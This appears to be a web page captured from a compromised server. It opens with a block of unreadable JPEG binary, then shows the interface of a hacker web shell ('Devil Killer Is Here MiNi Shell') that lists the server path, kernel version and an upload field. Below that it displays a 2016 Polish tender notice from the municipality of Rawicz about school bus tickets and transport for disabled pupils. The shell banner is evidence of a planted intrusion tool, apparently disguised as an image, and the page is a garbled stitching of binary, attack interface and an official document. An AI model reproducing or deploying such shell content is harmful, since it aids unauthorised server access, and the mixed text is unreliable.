JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160614/83647-N-2016.html

<p class="kh_header"><b>Rawicz: Zakup biletów miesięcznych dla uczniów oraz dowóz uczniów niepełnosprawnych 
z terenu  gminy Rawicz do placówek oświatowych w okresie od września do grudnia 2016 roku</b><br>
<b>Numer ogłoszenia: 83647 - 2016; data zamieszczenia: 14.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Rawicz działający w imieniu Gminy Rawicz , ul. Piłsudskiego 21, 63-900 Rawicz, woj. wielkopolskie, tel. 065 5465400, faks 065 5464167.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rawicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup biletów miesięcznych dla uczniów oraz dowóz uczniów niepełnosprawnych 
z terenu  gminy Rawicz do placówek oświatowych w okresie od września do grudnia 2016 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem  zamówienia jest zakup biletów miesięcznych  dla uczniów dojeżdżających z terenu gminy Rawicz do placówek oświatowych  prowadzonych przez gminę Rawicz, w celu korzystania z usługi przewozów regularnych  osób 
w krajowym transporcie drogowym w ramach  linii regularnych obejmujących miejscowości, z których  dojeżdżają uczniowie do gimnazjów w Rawiczu i Sierakowie, szkół podstawowych w Rawiczu i Zielonej Wsi oraz Zespołu Szkół Specjalnych w Rawiczu (pakiet I i II) oraz świadczenie  usług  polegających na codziennym dowozie uczniów niepełnosprawnych  z terenu gminy Rawicz do Zespołu  Szkół Specjalnych przy ul. Grota Roweckiego 9f w Rawiczu  oraz  Przedszkola nr 5 Oddziały Specjalne przy ul. Sarnowskiej 9A w Rawiczu  i odwiezieniu  ich po zajęciach  do miejsca zamieszkania wraz zapewnieniem im opieki podczas dowozu i odwozu, na podstawie  ustalonego  harmonogramu dowozu  i odwozu  (pakiet III). 
Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr 7 i 8 do SIWZ. 

2.	Postępowanie o udzielenie zamówienia w zakresie dowozu dzieci do placówek oświatowych na terenie miasta i gminy Rawicz w roku szkolnym 2016 / 2017 ze względu na planowane zmiany w ustawie o publicznym transporcie zbiorowym będzie prowadzone w dwóch etapach - częściach. 
 
3.	Niniejsze zamówienie w ramach pierwszej części będzie realizowane w terminie  od 01.09. 2016 roku do 31.12. 2016 roku  ( z wykluczeniem dni wolnych od zajęć szkolnych ), we wszystkie dni nauki szkolnej tzn. usługa świadczona będzie w dni powszednie z wyjątkiem świąt i innych dni ustawowo wolnych od pracy a także przerw w realizacji zajęć dydaktyczno - wychowawczych, określonych na podstawie przepisów rozporządzenia Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego  (Dz. U. z 2002 r., nr 46, poz. 432 ze zm.). 

4.	Ilość dni nauki w ramach niniejszego zamówienia w okresie od września 2016 roku do grudnia 2016 roku wynosi  79  dni.     

5.	Zamawiający dopuszcza możliwość składania ofert częściowych. Wobec tego dokonał podziału zamówienia na trzy pakiety (części):
 
Pakiet  I i  II  - dotyczy zakupu biletów miesięcznych ulgowych dla uczniów dojeżdżających z terenu gminy Rawicz do placówek oświatowych  prowadzonych  przez gminę Rawicz, w celu korzystania z usługi przewozów regularnych osób 
w krajowym transporcie drogowym w ramach linii regularnych;  

Pakiet III -  dotyczy codziennego dowozu uczniów niepełnosprawnych  z terenu gminy Rawicz do Zespołu  Szkół Specjalnych przy ul. Grota Roweckiego 9f w Rawiczu  oraz  Przedszkola nr 5 Oddziały Specjalne przy ul. Sarnowskiej 9A w Rawiczu  i odwiezieniu  ich po zajęciach  do miejsca zamieszkania wraz zapewnieniem im opieki podczas dowozu i odwozu, na podstawie  ustalonego  harmonogramu dowozu  i odwozu  (pakiet III). 
Zamawiający zastrzega możliwość  zmiany adresu siedziby  Przedszkola nr 5 Oddziału Specjalnego, o czym zostanie poinformowany wybrany Wykonawca. 

6.	Na dzień sporządzenia SIWZ w okresie realizacji zamówienia do korzystania z usług uprawnionych będzie: 
pakiet I -  339  uczniów,  pakiet II - 443 uczniów, pakiet III -  7 uczniów niepełnosprawnych.
Ogółem liczba dowożonych uczniów w ramach całego zamówienia będzie wynosić 789  osób. 
Liczbę uczniów podano  wg stanu na m-c maj 2016 r. na podstawie złożonych informacji przez dyrektorów szkół. 
Wykaz szkół, miejscowości objętych dowozem oraz ilość dowożonych uczniów z poszczególnych miejscowości z podziałem na pakiety  podano w  załączniku nr  7. 
Ilości podane wyżej mogą ulec zmianie w zależności od decyzji rodziców dot. wyboru szkoły, w której dziecko będzie spełniać obowiązek szkolny lub nauki, jak również z innych mogących  wystąpić przyczyn. 
Zamówienie mniejszej ilości usług nie jest traktowane jako odstąpienie od umowy przez Zamawiającego i nie daje po stronie Wykonawcy żadnych roszczeń, w szczególności o odszkodowanie. Ceny jednostkowe usług obowiązują przez cały okres realizacji zamówienia. 

7.	Dodatkowe informacje w zakresie zamówienia obejmują : 
1)	Usługi mają być świadczone środkami transportu przystosowanymi do przewozu młodzieży szkolnej i uczniów  niepełnosprawnych spełniającymi wszystkie wymagania bezpieczeństwa, higieny i kodeksu drogowego, przez osoby mające odpowiednie uprawnienia do świadczenia tych usług.  Wykonawca zamówienia musi dysponować autobusami z odpowiednią ilością miejsc w pojazdach i odpowiednią liczbą autobusów, zapewniających  dowóz wszystkich uczniów na poszczególnych trasach w wyznaczonych godzinach.   

2)	W przypadku awarii pojazdu Wykonawca jest zobowiązany do zapewnienia zastępczego środka transportu, w taki sposób aby nie powodował opóźnień czasowych kursu. Wobec powyższego jest zobowiązany posiadać autobus rezerwowy.

3)	Wykonawca usługi zobowiązany jest do zawarcia umowy ubezpieczeniowej od odpowiedzialności cywilnej oraz następstw nieszczęśliwych wypadków w związku z wykonywaniem przedmiotu umowy ( na okres obowiązywania realizacji zamówienia).

4)	Wszystkie dzieci  muszą być przywiezione do szkół najpóźniej na 5 min przed rozpoczęciem zajęć lekcyjnych  i nie wcześniej niż 15 minut przed rozpoczęciem zajęć lekcyjnych.  (patrz -  uwaga w wykazie ). 
Godziny dowozu muszą umożliwiać dowożonym uczniom punktualne rozpoczęcie zajęć lekcyjnych. 

5)	Usługi  będą świadczone do niżej podanych placówek oświatowych na  terenie Gminy Rawicz zgodnie z ustalonym  i zatwierdzonym wykazem tras i godzinami rozpoczęcia i zakończenia zajęć stanowiącym załącznik nr 8. Zamawiający zastrzega sobie możliwość  dokonania zmian wykazie w zakresie: tras, nazw miejscowości i przystanków, godzin oraz ilości uczniów. W przypadku potrzeby wprowadzenia takim zmian Zamawiający w porozumieniu z Dyrektorem Szkoły poinformuje Wykonawcę o potrzebie wprowadzenia zmian.  
WYKAZ SZKÓŁ:  

PAKIET I : 
Szkoła Podstawowa nr 4 w Rawiczu ul. Broniewskiego 5, 
Gimnazjum nr 1 w Rawiczu ul. Szarych Szeregów nr  3,
Szkoła Podstawowa Zielona Wieś nr 72,  
Zespół Szkół Specjalnych w Rawiczu ul. Grota Roweckiego nr  9F
Szkoła Podstawowa w Słupi Kapitulnej nr 117  
PAKIET II :
Szkoła Podstawowa nr 5 w Rawiczu , ul. Szkolna nr 3, 
Gimnazjum w Sierakowie, ul. Przyjemskiego 35, 63-900 Rawicz,
Zespół Szkół Specjalnych w Rawiczu ul. Grota Roweckiego nr 9F
Gimnazjum nr 1 w Rawiczu ul. Szarych Szeregów nr 3    

PAKIET III 
Zespół Szkół Specjalnych w Rawiczu ul. Grota Roweckiego nr 9F,
Przedszkole nr 5 Oddziały Specjalne  ul. Sarnowska 9A  w Rawiczu
 
6)	W ramach pakietu II będą dowożone dzieci z Masłowa  do Gimnazjum nr 1 w Rawiczu oraz dzieci z Osiedla Sarnowa do Gimnazjum w Sierakowie a następnie do siedziby Gimnazjum nr 1 w Rawiczu.
   
7)	Wykonawca przy realizacji usług zobowiązany będzie do: zapewnienia maksimum bezpieczeństwa przewożonych uczniów zgodnie z obowiązującymi przepisami technicznymi i normami dotyczącymi transportu zbiorowego osób, stosowania odpowiedniego taboru do przewozu dzieci i młodzieży szkolnej oraz uczniów niepełnosprawnych, oraz jego prawidłowe oznakowanie zgodnie z obowiązującymi  w tym zakresie przepisami, ubezpieczenie w zakresie OC, NNW przez cały okres wykonywania zamówienia oraz ponoszenie kosztów szkód wynikłych w czasie wykonywania usług  jak również za odpowiedzialność za wszelkie zdarzenia powstałe z tej przyczyny.

8)	Wykonawca  zobowiązuje się realizować  przedmiot umowy  zgodnie z obowiązującymi  przepisami prawa, w szczególności  w zgodnie z ustawą z dnia 7 września 2001 r.  o transporcie drogowym (Dz. U z 2013 roku  poz.  1414 ze zmianami)  ustawą z dnia 20 czerwca 1997 r.  Prawo o ruchu drogowym  (Dz. U. z 2012 roku poz. 1137 ze zmianami)  rozporządzeniem  Ministra Infrastruktury  z dnia 31 grudnia 2002 r. w sprawie  warunków technicznych  pojazdów oraz zakresu ich niezbędnego  wyposażenia (Dz. U. z 2015  poz. 305 ze zmianami) oraz wymaganymi prawem w tym zakresie licencjami i zezwoleniami.  Wobec tego Zamawiający zastrzega sobie prawo do sprawdzenia wszelkich wymaganych prawem dokumentów związanych z prawidłowym i pełnym wykonywaniem umowy jak również kontrolowania staranności  w wykonywaniu  przedmiotu umowy.

  
8.	Zakres zamówienia obejmuje w szczególności:  

w zakresie PAKIETU  I i II  w ramach zakupu biletu miesięcznego    

1)	Przewóz uczniów (dowóz do szkół i odwóz  do miejsca zamieszkania)  na utworzonych przez Wykonawcę  liniach, z pierwszeństwem przejazdu uczniów z biletem miesięcznym. Wykonawca musi posiadać zezwolenia na wykonywanie regularnych przewozów osób w krajowym transporcie drogowym na trasach, które przewidują zatrzymywanie się autobusów w poszczególnych miejscowościach na przystankach podanych przez Zamawiającego w załączniku nr 7 i 8 do SIWZ w określonym czasie,  przedziale czasowym określonym przez Zamawiającego.  Jeżeli w dniu składania oferty Wykonawca nie posiada w/w zezwoleń lub posiadane zezwolenia muszą zostać dostosowane do wymagań Zamawiającego (zmiany wcześniej zatwierdzonych rozkładów jazdy), Wykonawca z którym zostanie zawarta umowa w sprawie zamówienia, zobowiązany będzie do uzyskania/zmiany takich zezwoleń przed rozpoczęciem roku szkolnego 2016/2017  tj. przed 01 września 2016 roku. Wobec tego Wykonawca w treści oferty złoży stosowne oświadczenie w tej sprawie.  

2)	Opieka nad dziećmi w czasie przewozu w środkach  transportu będzie zapewniona przez ZAMAWIAJACEGO.   Na każdej trasie, w każdym autobusie opiekę nad uczniami sprawować będzie opiekun zatrudniony w danej jednostce oświatowej w ramach umowy lub zatrudniony przez Zamawiającego. Dane osobowe opiekunów zostaną zgłoszone Wykonawcy.

3)	Imienna lista uczniów, dla których mają być zakupione bilety na dany  okres rozliczeniowy (z podziałem na poszczególne placówki oświatowe) będzie przekazywana wybranemu Wykonawcy przez Zamawiającego - przed rozpoczęciem każdego miesiąca. 

4)	Ilość ( zamówionych )  kupowanych biletów miesięcznych w okresie obowiązywania umowy może ulegać zmianie. Powyższe nie powoduje zmianą ceny biletu.  

5)	Wykonawca jest zobowiązany dostarczyć bilety miesięczne do dyrektora danej szkoły  do ostatniego dnia roboczego każdego miesiąca. 

6)	Rozliczenia będą dokonywane w cyklu miesięcznym na podstawie zestawienia zamówionych biletów 
 miesięcznych.   Rozliczenie usługi ( dowóz i odwóz dzieci na podstawie zakupionego biletu) dokonywane             
 będzie po wykonaniu całości zamówienia w cyklu miesięcznym w oparciu o zestawienie biletów.

7)	Podstawą miesięcznego rozliczenia należności za wykonane usługi stanowić będzie cena jednego biletu miesięcznego podana w ofercie oraz ilość uczniów dla których zostaną zamówione - zakupione bilety, 
z podziałem na poszczególne placówki oświatowe. 

w zakresie PAKIETU III  dowóz uczniów niepełnosprawnych:   
 		
8)	W ramach pakietu III  Wykonawca będzie zobowiązany do dowozu uczniów/dzieci posiadających orzeczenie o niepełnosprawności do Zespołu Szkół Specjalnych w Rawiczu oraz  do Przedszkola nr 5 Oddziały Specjalne w Rawiczu.  Wobec powyższego  Zamawiający wymaga, aby Wykonawca zapewnił odpowiedni pojazd umożliwiający transport  dzieci niepełnosprawnych oraz zapewnił odpowiednią opiekę 
i niezbędną pomoc przy wsiadaniu i wysiadaniu z pojazdu. Pojazd którym będą dowożone dzieci powinien być przystosowany konstrukcyjnie do przewozu osób niepełnosprawnych. 
Stan techniczny pojazdu Wykonawcy winien być dostosowany do przewozu osób niepełnosprawnych  i być 
zgodny z obowiązującymi w tym zakresie przepisami. Ponadto pojazd musi być wyposażony w foteliki dziecięce. Każde dziecko musi mieć zapewnione miejsce siedzące. Na dzień sporządzania SIWZ do korzystania z dowozów uprawnionych jest 7 dzieci niepełnosprawnych. Godziny rozpoczęcia i zakończenia zajęć podano w załączniku nr 8. (ostateczny harmonogram dowozu zostanie ustalony pomiędzy Przewoźnikiem a Zamawiającym). Przyjmuje się ilość kilometrów dziennie do wykonania celem zrealizowania dowozu i odwozu w wysokości 54 km. Podczas transportu uczniów z domów do szkół i ze szkół do domów pełną odpowiedzialność za dzieci oraz prawidłową realizację ponosi Wykonawca. Dzieci będą odbierane spod domu o ustalonej wcześniej godzinie i po dowiezieniu na zajęcia będą przekazane pod opiekę nauczyciela lub innej osoby upoważnionej do odbioru z analogiczną regułą przy odwożeniu  dzieci po zajęciach. Pracownicy Wykonawcy sprawujący opiekę muszą zachować szczególną dbałość o dobro dzieci w czasie jazdy oraz pomagać dzieciom przy wsiadaniu do pojazdu i wysiadaniu. 
Do obowiązków opiekuna  należy również  zwracanie uwagi na właściwe zachowanie się dzieci podczas przejazdu oraz utrzymanie stałego  kontaktu  z rodzicami   i dyrektorami poszczególnych placówek oświatowych   m.in.  sprawach  dotyczących zmian w organizacji  dowozu , choroby dziecka itp.  

9)	Opieka nad dziećmi w czasie przewozu w środkach  transportu będzie zapewniona przez WYKONAWCĘ, który w ramach niniejszego zamówienia i zaoferowanej ceny  jest zobowiązany do zapewnienia stałej 
i wykwalifikowanej opieki nad dziećmi. Pracownicy Wykonawcy sprawujący opiekę muszą zachować szczególną dbałość o dobro dzieci w czasie jazdy oraz pomagać dzieciom przy wsiadaniu do pojazdu 
i wysiadaniu oraz ponoszą pełną odpowiedzialność za ich bezpieczeństwo. Opieka powinna być sprawowana  podczas każdego kursu.  Obowiązków opiekuna nie może pełnić osoba kierująca pojazdem. 
 
10)	Imienna lista uczniów wraz z adresem przewidzianych do dowozu i  wskazaniem placówki oświatowej będzie przekazana wybranemu Wykonawcy przez Zamawiającego  - przed rozpoczęciem każdego miesiąca.

11)	Ilość uczniów niepełnosprawnych przewidzianych do dowozu w okresie obowiązywania umowy może uleć zmianie. Powyższe zmiany nie będą jednak wpływać na zmianę stawki za kilometr.
 
12)	Rozliczenie usługi  będzie dokonywane w cyklu miesięcznym. Podstawą do rozliczenia należności za wykonane usługi stanowić będzie cena jednego kilometra podana w ofercie  przez Wykonawcę oraz ilość kilometrów podana w harmonogramie, chyba że zostanie zrealizowana mniejsza ilość kilometrów. 

13)	Zamawiający zastrzega możliwość odstępstw od ustalonego harmonogramu przewozu w szczególności 
z powodu zmiany: planu lekcji i zajęć,  ilości dzieci ( w tym przerwy w nauce spowodowane chorobą),  zmiany organizacji zajęć polegających  na odpracowaniu  zajęć itd.).  O takich przypadkach Wykonawca zostanie powiadomiony przez wskazanego przez Zamawiającego przedstawiciela na dzień przed terminem zmian..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt  6 ustawy, stanowiących nie więcej niż 30 % wartości zamówienia podstawowego dla części - pakietu I i II oraz nie więcej niż 50 % wartości  zamówienia podstawowego dla części  - pakietu III,   polegających na powtórzeniu tego samego rodzaju zamówień, w okresie 3 lat od udzielenia zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.10.00.00-9, 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każdy WYKONAWCA  przystępujący do przetargu jest obowiązany wnieść wadium wysokości ustalonej dla danego pakietu na który składa ofertę i tak:
a)  PAKIET I 	-     800,00 PLN    
b)  PAKIET II	-  1 000,00 PLN   
c)  PAKIET III	-     400,00 PLN 

2.	Wadium  musi obejmować cały okres związania ofertą i może być wniesione:  w pieniądzu ,  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach  bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9.11. 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

3.	W przypadku wyboru wpłaty wadium  w pieniądzu należy je wnieść przelewem na rachunek bankowy Zamawiającego GETIN NOBLE BANK SA 82 1560 0013 2885 7118 4000 0005.  
	Przy wnoszeniu wadium Wykonawca winien na blankiecie przelewu powołać się na nazwę zadania podaną przez  Zamawiającego. Zaleca się, aby kopia dowodu przelewu została potwierdzona za zgodność z oryginałem i dołączona do oferty. 
	Wydanie polecenia przelewu nie jest jednoznaczne z wniesieniem, dokonaniem zapłaty określonej kwoty wadium.  O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono  w wymaganym terminie, decyduje data i godzina wpływu środków na wskazany wyżej  rachunek Zamawiającego. 

4.	Jeżeli Wykonawca wnosi wadium w innej formie niż pieniężna, odpowiednie dokumenty w formie oryginału należy złożyć  ( w terminie wskazanym w SIWZ )   poprzez dołączenie do oferty w taki  sposób aby mogły one stanowić osobny dokument tzn. nie były trwale związane z ofertą i istniała możliwość bez naruszenia oferty odesłać ten dokument po jego wykorzystaniu. 
	Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium we wszystkich okolicznościach określonych w ustawie Prawo zamówień publicznych  -  art. 46 ust. 4a i  5 ustawy PZP.
5. Pozostałe zapisy dotyczące wadium  wynikają z rozdziału XII SIWZ oraz ustawy PZP</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać uprawnienia do wykonywania określonej działalności. Zamawiający uzna za spełnienie tego warunku na podstawie załączonej do oferty aktualnej licencji na wykonywanie krajowego transportu drogowego osób, zgodnie z ustawą z dnia 06.09. 2001 roku o transporcie drogowym (t.j. Dz. U. z 2013 r. poz. 1414 z póź. zm.) oraz Oświadczenia Wykonawcy potwierdzającego spełnienie tego warunku (załącznik nr 2 do SIWZ). 
Jeżeli  Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast aktualnej licencji składa dokument lub dokumenty wystawione w kraju, w którym ma miejsce zamieszkania lub siedzibę, potwierdzające odpowiednio, że posiada uprawnienia  do wykonywania działalności związanej z przedmiotem zamówienia. 
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie złożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie świadczył lub świadczy należycie co najmniej  jedno zamówienie związane z przewozem osób o wartości brutto: dla pakietu I - 20.000 zł,  dla pakietu II - 25.000,00 zł,   dla pakietu III -  10.000,00 zł.  
Gdy Wykonawca składa ofertę na wybrany pakiet to musi wykazać spełnienie warunku ustalonego dla tego pakietu, natomiast gdy składa oferty na  dwa lub trzy pakiety wystarczy wykazać spełnienie warunku ustalonego dla pakietu o większej wartości, z tych na które składa ofertę. W takim przypadku  Zamawiający uzna za spełnienie  tego warunku dla obu lub wszystkich pakietów,  na które została złożona oferta. Zamawiający 
w przypadku, gdy przedmiotem zamówienia są świadczenia okresowe i ciągłe dopuszcza nie tylko zamówienia wykonane (tj. zakończone), ale również wykonywane (w trakcie realizacji).  W takim przypadku  część zamówienia już faktycznie wykonana musi spełnić wymogi określone przez Zamawiającego w  niniejszym punkcie.  Warunek wiedzy i doświadczenia Wykonawcy oceniony zostanie na podstawie załączonego do oferty Oświadczenia Wykonawcy potwierdzającego spełnienie tego warunku (załącznik nr 2 do SIWZ)  wraz z załączeniem do oferty wykazu wykonanych lub wykonywanych głównych usług  w podanym wyżej okresie (załącznik nr 4 do SIWZ). 
W celu potwierdzenia spełnienia tego warunku, w wykazie usług głównych należy wskazać co najmniej jedną usługę związaną z przewozem osób o wartości i na zasadach podanych wyżej.  Ponadto do wykazu należy załączyć dowody, z których będzie wynikało, że usługi zostały wykonane należycie lub są wykonywane należycie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie złożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.  Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
